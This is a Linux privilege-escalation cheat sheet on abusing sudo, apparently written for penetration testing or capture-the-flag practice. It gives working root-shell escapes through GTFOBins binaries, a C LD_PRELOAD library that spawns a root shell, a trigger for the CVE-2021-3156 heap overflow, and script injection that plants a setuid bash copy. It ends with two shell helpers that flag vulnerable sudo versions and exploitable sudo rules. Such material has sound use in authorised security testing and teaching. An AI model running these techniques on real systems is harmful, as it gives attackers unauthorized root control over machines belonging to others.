SUDO

Check sudo permissions

What can you run as root? — First thing to check always

sudo -l
(use sudo -n -l when you have no password: -n fails instead of hanging on the prompt)
Example Output
sudo -l
User www-data may run the following commands on target:
  (root) NOPASSWD: /usr/bin/vim
  (root) NOPASSWD: /usr/bin/find
  (ALL) NOPASSWD: /opt/backup.sh
(Check GTFOBins for vim and find; /opt/backup.sh is a script, so check whether you can write to it; also read any "Matching Defaults entries" line for env_keep)

GTFOBins lookup

Abuse allowed binaries — BOOKMARK THIS SITE

https://gtfobins.github.io/
Search for each sudo binary
Example Output
sudo -l shows: (root) NOPASSWD: /usr/bin/find

GTFOBins: https://gtfobins.github.io/gtfobins/find/
Sudo: sudo find . -exec /bin/sh \; -quit

# whoami
root

Sudo with no password

Run directly without password — Free root commands

If (NOPASSWD) in sudo -l output
Example Output
sudo -l
(root) NOPASSWD: /usr/bin/vim

sudo vim -c ':!bash'
# whoami
root
(No password prompt = direct escalation)

Sudo env_keep (LD_PRELOAD)

Hijack shared library loading — Runs your code as root

If sudo -l shows env_keep+=LD_PRELOAD in the Defaults (or a SETENV: tag on the rule), sudo passes LD_PRELOAD through to the root process and ld.so loads your library before the allowed command's main() runs:
gcc -shared -fPIC -o /tmp/pe.so pe.c
sudo LD_PRELOAD=/tmp/pe.so <allowed_cmd>
Example Output
sudo -l shows: env_keep+=LD_PRELOAD

pe.c (compile with the gcc line above):
#include <stdlib.h>
#include <unistd.h>
/* constructor: runs when ld.so maps the library, before the command starts */
__attribute__((constructor)) void pe(void) {
    unsetenv("LD_PRELOAD");      /* don't preload into the shell we spawn */
    setgid(0); setuid(0);
    system("/bin/bash -p");
}

sudo LD_PRELOAD=/tmp/pe.so /usr/bin/allowed_command
# whoami
root
(Any allowed binary works as long as it is dynamically linked; give LD_PRELOAD an absolute path)

Sudo version exploit

sudo < 1.8.28 = CVE-2019-14287 (only with a rule like (ALL, !root): sudo -u#-1 bypasses the !root); sudo 1.8.2 to 1.8.31p2 and 1.9.0 to 1.9.5p1 = CVE-2021-3156 (Baron Samedit, heap overflow in sudoedit -s)

sudo --version
Search: sudo <version> exploit
(Distros backport fixes without changing the version string, so confirm with a check before trusting the number)

CVE-2019-14287 check (needs a (ALL, !root) style rule): sudo -u#-1 id
CVE-2021-3156 check: sudoedit -s /
  "sudoedit: /: not a regular file" = vulnerable
  "usage: sudoedit ..."             = patched
Example Output
sudo --version
Sudo version 1.8.31

CVE-2021-3156 (Baron Samedit):
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): corrupted
(Heap corruption = vulnerable. Exploitation needs a full public CVE-2021-3156 PoC, not a one-liner)
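The version ranges above as a small POSIX sh helper. This is an added example, not part of the original cheat sheet: the function names are mine, the ranges are the published affected versions for the two CVEs, and the "Sudo version 1.8.31" string is this page's sample. A hit means "possibly vulnerable" only; confirm with sudoedit -s / or sudo -u#-1 id, because distribution packages backport fixes without bumping the version.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): map a sudo version
# string onto the CVE-2019-14287 and CVE-2021-3156 ranges. A hit means
# "possibly vulnerable" only: distro packages backport fixes without
# changing the version string, so confirm with `sudoedit -s /` or
# `sudo -u#-1 id` before reaching for an exploit.

# "1.8.31p2" (or the whole "Sudo version 1.8.31p2" line) -> one integer:
# major*1000000 + minor*10000 + patch*100 + pN, so ranges compare with -lt/-le.
sudo_version_key() {
    v=${1#"Sudo version "}
    p=0
    case $v in
        *p*) p=${v##*p}; v=${v%p*} ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $v
    IFS=$old_ifs
    echo $(( ${1:-0} * 1000000 + ${2:-0} * 10000 + ${3:-0} * 100 + p ))
}

# Prints one CVE per line for each range that contains the version, nothing if none.
sudo_version_cves() {
    k=$(sudo_version_key "$1")
    [ "$k" -gt 0 ] || return 1          # empty / unparsable input
    # CVE-2019-14287: < 1.8.28. Only exploitable when a rule lets you run as
    # "(ALL, !root)" or similar: `sudo -u#-1 cmd` then runs as uid 0 anyway.
    if [ "$k" -lt "$(sudo_version_key 1.8.28)" ]; then
        echo CVE-2019-14287
    fi
    # CVE-2021-3156 (Baron Samedit): legacy 1.8.2 .. 1.8.31p2 and
    # stable 1.9.0 .. 1.9.5p1; fixed in 1.9.5p2.
    if { [ "$k" -ge "$(sudo_version_key 1.8.2)" ] && [ "$k" -le "$(sudo_version_key 1.8.31p2)" ]; } ||
       { [ "$k" -ge "$(sudo_version_key 1.9.0)" ] && [ "$k" -le "$(sudo_version_key 1.9.5p1)" ]; }; then
        echo CVE-2021-3156
    fi
}

# Run against the installed sudo (first line of `sudo --version` only).
check_installed_sudo() {
    sudo_version_cves "$(sudo --version 2>/dev/null | head -n 1)"
}

# The version from this page's sample output:
sudo_version_cves "Sudo version 1.8.31"     # prints CVE-2021-3156
```

On a target, call check_installed_sudo; it returns nothing (and a non-zero status) when sudo is missing rather than guessing.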

Sudo with shell escape

Many programs have shell escapes — Check GTFOBins for each binary

sudo vim -> :!sh
sudo less /etc/profile -> !sh   (less and man need a file or page to open first)
sudo man man -> !sh
sudo awk 'BEGIN {system("/bin/sh")}'
(Blocked when the rule carries the NOEXEC: tag, which stops the program from executing anything else)
Example Output
sudo vim -c ':!sh'

# whoami
root
(Escaped to root shell via vim)

Sudo script injection

Edit the script, add reverse shell — Writable scripts run as root

If sudo allows running a script you can modify (or replace: a writable parent directory is just as good)
Example Output
sudo -l: (root) /opt/backup.sh

ls -la /opt/backup.sh
-rwxrwxrwx 1 root root  <- WORLD WRITABLE!

echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /opt/backup.sh
sudo /opt/backup.sh
/tmp/rootbash -p
# whoami
root
(-p keeps the root euid; if /tmp is mounted nosuid, write rootbash somewhere else)
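The sudo -l, NOPASSWD and script-injection checks above, done in one pass. This is an added example and not part of the original cheat sheet: the function names, the short GTFO_SHELL hint list and the SAMPLE text are mine; the sample is constructed to match the examples on this page, and the list is a hint only, not a substitute for looking each binary up on GTFOBins.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet: triage `sudo -l`
# output the way the sections above do by hand. Reads the output on stdin
# and prints one finding per line:
#   LD_PRELOAD ...                          Defaults keeps LD_PRELOAD
#   <runas> NOPASSWD|PASSWD <path> <class>
# <class> is gtfobins (shell escape known), writable (we can edit the
# target: script injection) or check (look it up).

set -f   # sudoers rules may contain "*"; never let the shell glob them

# Programs whose GTFOBins page has a "Sudo" entry that drops to a shell.
# Deliberately short and an assumption of this example: look every binary up.
GTFO_SHELL="vim vi nano find less more man awk env python python3 perl bash sh"

is_gtfo_shell() {
    for b in $GTFO_SHELL; do
        if [ "$1" = "$b" ]; then return 0; fi
    done
    return 1
}

# One word for a target path: writable beats gtfobins beats check.
classify_target() {
    if [ -e "$1" ] && [ -w "$1" ]; then echo writable; return 0; fi
    if is_gtfo_shell "${1##*/}"; then echo gtfobins; return 0; fi
    echo check
}

triage_sudo_l() {
    while IFS= read -r line; do
        case $line in
            *env_keep*LD_PRELOAD*) echo "LD_PRELOAD kept by env_keep: see the LD_PRELOAD section" ;;
        esac
        case $line in
            *"("*")"*) ;;                 # rule lines carry a "(runas)" spec
            *) continue ;;
        esac
        runas=${line#*\(}; runas=${runas%%\)*}
        set -- ${line#*\)}                # whitespace-split what follows the runas spec
        pw=PASSWD
        # leading tags end in ":" (NOPASSWD:, SETENV:, NOEXEC:, ...)
        while [ $# -gt 0 ] && [ "${1%:}" != "$1" ]; do
            case $1 in
                NOPASSWD:) pw=NOPASSWD ;;
                SETENV:)   echo "$runas SETENV tag: may pass VAR=value on the sudo line, incl. LD_PRELOAD" ;;
                NOEXEC:)   echo "$runas NOEXEC tag: shell escapes from the program are blocked" ;;
            esac
            shift
        done
        rest=$*
        old_ifs=$IFS; IFS=,
        for cmd in $rest; do              # several commands may share one line
            IFS=$old_ifs
            set -- $cmd                   # first word is the program, the rest fixed args
            [ $# -gt 0 ] || continue
            if [ "$1" = ALL ]; then
                echo "$runas $pw ALL (sudo -i or sudo su, no lookup needed)"
            else
                echo "$runas $pw $1 $(classify_target "$1")"
            fi
        done
        IFS=$old_ifs
    done
}

# Constructed sample in the shape this page's examples use:
SAMPLE='Matching Defaults entries for www-data on target:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD

User www-data may run the following commands on target:
    (root) NOPASSWD: /usr/bin/vim, /usr/bin/find
    (ALL) NOPASSWD: /opt/backup.sh
    (ALL : ALL) ALL'

printf '%s\n' "$SAMPLE" | triage_sudo_l
# On a real target:  sudo -n -l 2>/dev/null | triage_sudo_l
```

The writable class is decided by the current user's access, so run it as the account you actually have; a "check" result for a script means only that you cannot write it, not that it is safe (it may still call something you control).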